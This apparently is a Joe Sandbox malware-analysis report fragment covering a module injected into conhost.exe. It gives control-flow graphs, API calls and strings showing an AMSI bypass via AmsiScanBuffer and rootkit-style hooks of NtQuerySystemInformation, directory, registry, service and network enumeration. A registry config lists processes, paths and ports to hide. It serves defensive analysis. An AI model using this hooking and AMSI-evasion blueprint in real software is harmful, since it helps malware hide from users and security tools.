8518->8519 8520 286d7d2473c 8519->8520 8521 286d7d19324 _CreateFrameInfo 9 API calls 8520->8521 8522 286d7d2477e 8521->8522 9071 286d7d18672 9072 286d7d190c0 __std_exception_copy 38 API calls 9071->9072 9073 286d7d1869d 9072->9073 8231 286d7d15974 8232 286d7d1597a 8231->8232 8243 286d7d17fa0 8232->8243 8236 286d7d159de 8238 286d7d15a77 8238->8236 8240 286d7d15bfd 8238->8240 8256 286d7d17b80 8238->8256 8239 286d7d15cfb 8240->8239 8241 286d7d15d77 VirtualProtect 8240->8241 8241->8236 8242 286d7d15da3 GetLastError 8241->8242 8242->8236 8244 286d7d17fab 8243->8244 8245 286d7d159bd 8244->8245 8246 286d7d1b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8244->8246 8247 286d7d17fca 8244->8247 8245->8236 8252 286d7d14400 8245->8252 8246->8244 8248 286d7d17fd5 8247->8248 8262 286d7d187b8 8247->8262 8266 286d7d187d8 8248->8266 8253 286d7d1441d 8252->8253 8255 286d7d1448c 8253->8255 8275 286d7d14670 8253->8275 8255->8238 8257 286d7d17bc7 8256->8257 8300 286d7d17950 8257->8300 8260 286d7d18070 _invalid_parameter_noinfo 8 API calls 8261 286d7d17bf1 8260->8261 8261->8238 8263 286d7d187c6 std::bad_alloc::bad_alloc 8262->8263 8270 286d7d19178 8263->8270 8265 286d7d187d7 8267 286d7d187e6 std::bad_alloc::bad_alloc 8266->8267 8268 286d7d19178 Concurrency::cancel_current_task 2 API calls 8267->8268 8269 286d7d17fdb 8268->8269 8271 286d7d19197 8270->8271 8272 286d7d191c0 RtlPcToFileHeader 8271->8272 8273 286d7d191e2 RaiseException 8271->8273 8274 286d7d191d8 8272->8274 8273->8265 8274->8273 8276 286d7d146b7 8275->8276 8277 286d7d14694 8275->8277 8280 286d7d146ed 8276->8280 8295 286d7d14250 8276->8295 8277->8276 8289 286d7d14120 8277->8289 8281 286d7d1471d 8280->8281 8282 286d7d14250 2 API calls 8280->8282 8283 286d7d14120 3 API calls 8281->8283 8287 286d7d14753 8281->8287 8282->8281 8283->8287 8284 286d7d14120 3 API calls 8285 286d7d1476f 8284->8285 8286 286d7d1478b 8285->8286 8288 286d7d14250 2 API calls 8285->8288 8286->8255 8287->8284 8287->8285 8288->8286 8292 286d7d14141 8289->8292 8290 286d7d141b0 8290->8276 8291 286d7d14196 VirtualQuery 8291->8290 8291->8292 8292->8290 8292->8291 8293 286d7d141ca VirtualAlloc 8292->8293 8293->8290 8294 286d7d141fb GetLastError 8293->8294 8294->8290 8294->8292 8296 286d7d14268 8295->8296 8297 286d7d142bd VirtualQuery 8296->8297 8298 286d7d142d7 8296->8298 8299 286d7d14322 GetLastError 8296->8299 8297->8296 8297->8298 8298->8280 8299->8296 8301 286d7d1796b 8300->8301 8302 286d7d17981 SetLastError 8301->8302 8303 286d7d1798f 8301->8303 8302->8303 8303->8260

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: aa93adcf77c80b2918b9fa9f83aacda109376ddc0562d94aefdd459ae859e877
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 4651BEAC312A4AA5FB20EFA4EC4D7D87320BB41358F84D513980D03579EE7A965BC393

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 896a41bb0789da3724037027665fc1d475b96b3b61b5b1f5244e3eebdc4f9f26
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: E6D09E1CB13600D6FA296F51EC5D7643261BF64B15FC4D495C90F022B0EE2D895AD393

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 00000286D7D13A35
                                                  • PathFindFileNameW.SHLWAPI ref: 00000286D7D13A44
                                                    • Part of subcall function 00000286D7D13F88: StrCmpNIW.SHLWAPI(?,?,?,00000286D7D1272F), ref: 00000286D7D13FA0
                                                    • Part of subcall function 00000286D7D13EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13EDB
                                                    • Part of subcall function 00000286D7D13EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F0E
                                                    • Part of subcall function 00000286D7D13EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F2E
                                                    • Part of subcall function 00000286D7D13EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F47
                                                    • Part of subcall function 00000286D7D13EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F68
                                                  • CreateThread.KERNELBASE ref: 00000286D7D13A8B
                                                    • Part of subcall function 00000286D7D11E74: GetCurrentThread.KERNEL32 ref: 00000286D7D11E7F
                                                    • Part of subcall function 00000286D7D11E74: CreateThread.KERNELBASE ref: 00000286D7D12043
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12049
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12055
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12061
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D1206D
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12079
                                                    • Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12085
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: c454ded60ffb063be2df13a0e9b680caf0471c50318e62a599a30da06a64ca06
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 02117C3D712F4282FB70A720E64D7AD72A0B794359F50C1299C0A811D0EF7DC458C753
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 0de59a6a2452775eb398cec1dc1c2e0e448d1d78a51cb2df41b820eb9dbac55a
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: DF91277AB022988FDB648F25D40EB7DB391FB54B94F54C1289E4987788DE38E853C711

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000286D7D11724: GetProcessHeap.KERNEL32 ref: 00000286D7D1172F
                                                    • Part of subcall function 00000286D7D11724: HeapAlloc.KERNEL32 ref: 00000286D7D1173E
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117AE
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117DB
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D117F5
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11815
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11830
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11850
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1186B
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1188B
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D118A6
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D118C6
                                                  • SleepEx.KERNELBASE ref: 00000286D7D11BDF
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D118E1
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11901
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1191C
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1193C
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11957
                                                    • Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11977
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11992
                                                    • Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1199C
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: a47a17ae4b68505d64a45506cdc0e8366eeb66d884fd5f0c3572f1a25e580087
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: A531DF6D302A4581FB509B27D95D369A3B6FB84BD0F04D4219E0E877DAEE26C851C31A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 197 286d7d12ff0-286d7d13069 199 286d7d1306f-286d7d13075 197->199 200 286d7d13384-286d7d133a7 197->200 199->200 201 286d7d1307b-286d7d1307e 199->201 201->200 202 286d7d13084-286d7d13087 201->202 202->200 203 286d7d1308d-286d7d1309d GetModuleHandleA 202->203 204 286d7d1309f-286d7d130af GetProcAddress 203->204 205 286d7d130b1 203->205 206 286d7d130b4-286d7d130d2 204->206 205->206 206->200 208 286d7d130d8-286d7d130f7 StrCmpNIW 206->208 208->200 209 286d7d130fd-286d7d13101 208->209 209->200 210 286d7d13107-286d7d13111 209->210 210->200 211 286d7d13117-286d7d1311e 210->211 211->200 212 286d7d13124-286d7d13137 211->212 213 286d7d13147 212->213 214 286d7d13139-286d7d13145 212->214 215 286d7d1314a-286d7d1314e 213->215 214->215 216 286d7d1315e 215->216 217 286d7d13150-286d7d1315c 215->217 218 286d7d13161-286d7d1316b 216->218 217->218 219 286d7d13251-286d7d13255 218->219 220 286d7d13171-286d7d13174 218->220 221 286d7d13376-286d7d1337e 219->221 222 286d7d1325b-286d7d1325e 219->222 223 286d7d13186-286d7d13190 220->223 224 286d7d13176-286d7d13183 call 286d7d11a30 220->224 221->200 221->212 225 286d7d1326f-286d7d13279 222->225 226 286d7d13260-286d7d1326c call 286d7d11a30 222->226 228 286d7d13192-286d7d1319f 223->228 229 286d7d131c4-286d7d131ce 223->229 224->223 231 286d7d132a9-286d7d132ac 225->231 232 286d7d1327b-286d7d13288 225->232 226->225 228->229 234 286d7d131a1-286d7d131ae 228->234 235 286d7d131fe-286d7d13201 229->235 236 286d7d131d0-286d7d131dd 229->236 242 286d7d132b9-286d7d132c6 lstrlenW 231->242 243 286d7d132ae-286d7d132b7 call 286d7d11cc4 231->243 232->231 241 286d7d1328a-286d7d13297 232->241 244 286d7d131b1-286d7d131b7 234->244 239 286d7d1320f-286d7d1321c lstrlenW 235->239 240 286d7d13203-286d7d1320d call 286d7d11cc4 235->240 236->235 237 286d7d131df-286d7d131ec 236->237 245 286d7d131ef-286d7d131f5 237->245 248 286d7d1322f-286d7d13241 call 286d7d13f88 239->248 249 286d7d1321e-286d7d1322d call 286d7d11cfc 239->249 240->239 251 286d7d13247-286d7d1324c 240->251 247 286d7d1329a-286d7d132a0 241->247 253 286d7d132d9-286d7d132e3 call 286d7d13f88 242->253 254 286d7d132c8-286d7d132d7 call 286d7d11cfc 242->254 243->242 258 286d7d132ee-286d7d132f9 243->258 244->251 252 286d7d131bd-286d7d131c2 244->252 245->251 255 286d7d131f7-286d7d131fc 245->255 247->258 259 286d7d132a2-286d7d132a7 247->259 248->251 263 286d7d132e6-286d7d132e8 248->263 249->248 249->251 251->263 252->229 252->244 253->263 254->253 254->258 255->235 255->245 267 286d7d132fb-286d7d132ff 258->267 268 286d7d13370-286d7d13374 258->268 259->231 259->247 263->221 263->258 271 286d7d13307-286d7d13321 call 286d7d23a40 267->271 272 286d7d13301-286d7d13305 267->272 268->221 273 286d7d13324-286d7d13327 271->273 272->271 272->273 276 286d7d13329-286d7d13347 call 286d7d23a40 273->276 277 286d7d1334a-286d7d1334d 273->277 276->277 277->268 278 286d7d1334f-286d7d1336d call 286d7d23a40 277->278 278->268
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: c1c11526f84db9e2d640cd65c95cc144147f533125a547aa03a8483807e7ef77
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 8FB1C13A312E9082EB69DF66D50C7A9B3A4F744B94F44D06AEE0953B94DF35CD84C341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 6723ad2e5e4461230c9ff76a06c814cb2a07fe0bf08aeb05023c7c4a4ee8564f
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: CE315C7A306B808AEB70CF60E8587EE7364F784758F54802ADA4E47B98DF78C649C711
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 46a8816f1eccec91265d7340e0120a4b08bd5adb28827ab856caf8b6af42f58b
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 6441933A315F8086E760CF24E8487AE73A4F789768F508126EE9D47B98DF38C555CB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: d3c70988a892759dff5b92b73d650b54a01a06affbf876819033b26700985735
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 8BA1282AB0678059FB20DB75E58C3AE7BB1E785B94F14C115DE9927B99CF38C442C702

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 9211349fff17926fa10688af0499826fed1ba2996b7bc1f892f1316a73f19abd
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 83713B3A712A50C6EB209F65E89DA9D33A4FB84B8CF409212DE4E57B28EF39C445C341

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 25354be73c7ffb90ee227dd09b7cd1ce63aa703a667fbaede99687d092f861bc
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 81516E36315B849AEB25CF62E84D76AB7A1F788F98F448124DE4A07758EF3CC04AC711

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 5df06b051aabdd4973b1e483568b970bea790204de5457453e43f62c0818b48b
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: BB51D329703B4491FE259B56E80C7A92390BB48BB0F988725DE3E573D0EF38D446C752

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true
                                                  • Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
